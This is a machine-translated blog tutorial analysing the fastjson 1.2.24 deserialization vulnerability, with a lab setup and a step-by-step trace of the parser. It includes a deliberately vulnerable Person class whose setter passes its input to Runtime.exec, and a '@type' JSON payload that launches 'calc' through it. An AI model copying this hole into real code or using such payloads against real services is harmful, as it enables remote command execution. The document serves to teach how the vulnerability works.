Chapter one fastjson1.2.24 Deserialization vulnerability principle code analysis

@ author Hongniao safety

Preface

       FastJson Vulnerability code analysis , In order to understand the vulnerability more deeply , It also paves the way for tapping common vulnerabilities in the future , Improve code audit capability , Accumulate more knowledge .

One 、FastJson

       FastJson Alibaba open source Java Objects and JSON Tool library for fast conversion of format string , For standard Google Of Gson.

advantage ：

• Fast
• Widely used
• Easy to use

Two 、FastJson Use

1.maven Project direct reference jar

<dependency>
    <groupId>com.alibaba</groupId>
    <artifactId>fastjson</artifactId>
    <version> Version according to your needs </version>
</dependency>

3、 ... and 、 Build a loophole environment

1.Idea newly build maven Document structure of the project

2.pom.xml introduce fastjson1.2.24jar package

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>org.fastjson</groupId>
    <artifactId>fastajson</artifactId>
    <version>1.0-SNAPSHOT</version>

    <dependencies>
        <dependency>
            <groupId>com.alibaba</groupId>
            <artifactId>fastjson</artifactId>
            <version>1.2.24</version>
        </dependency>
    </dependencies>

    <properties>
        <maven.compiler.source>8</maven.compiler.source>
        <maven.compiler.target>8</maven.compiler.target>
    </properties>

</project>

3. newly build Person class

First in Java Create a new package under the directory com.trancers.test, Then create a new... In the package Person class

package com.trancers.test;

import java.io.IOException;

public class Person {
    
    private String name;
    private Integer age;


    public String getName() {
    
        System.out.println("call getname");
        return name;
    }

    public void setName(String name) throws IOException {
    
        System.out.println("call setname");
        Runtime.getRuntime().exec(name);
        this.name = name;
    }

    public Integer getAge() {
    
        System.out.println("call getage");
        return age;
    }

    public void setAge(Integer age) {
    
        System.out.println("call setage");
        this.age = age;
    }
}

3. New main function TestMain

1. Simple in construction payload, Let's take a look at the calling procedure

package com.trancers.test;
import com.alibaba.fastjson.JSONObject;


public class TestMain {
    
    public static void main(String[] args) {
    
        String str = "{\"@type\":\"com.trancers.test.Person\",\"age\":20,\"name\":\"calc\"}";

        Object obj1 = JSONObject.parse(str);
        System.out.println(obj1);
    }
}

2. First of all to enter JONObject Class call parse Method

3. Call static parse The method with the same name is passed in test and DEFAULT_PARSER_FEATURE Two parameters

4. DEFAULT_PARSER_FEATURE In the load JSON Class loads the static code block at the same time and calculates the value 989

5. Create a DefaultJSONParser Object will JSONToken.LBRACE Assign a value to ((JSONLexerBase) lexer).token

6. to glance at parser What does the attribute contain , And then call parse Method

7. Before making a judgment in the method, it has been assigned a value in the previous method lexer.token So I will go to LBRACE

8. Created a hashmap object

9. call parseObject Method

10. Do lexical analysis and take out key value , And key Corresponding value value

11. because @type Into this judgment , Implemented class reflection ,@type Value is the path of the package, so according to com.trancers.test.Person Directly load classes

12. Then serialize , Take out all the properties of the class , And the incoming text Match , The property name of the class is the same as key The same value is assigned .

Four 、 summary

A brief analysis of fastjson Causes of deserialization vulnerability 、 Call procedures and trigger points .

Hongniao only wants to have wings together Point wings flying thousands of miles

``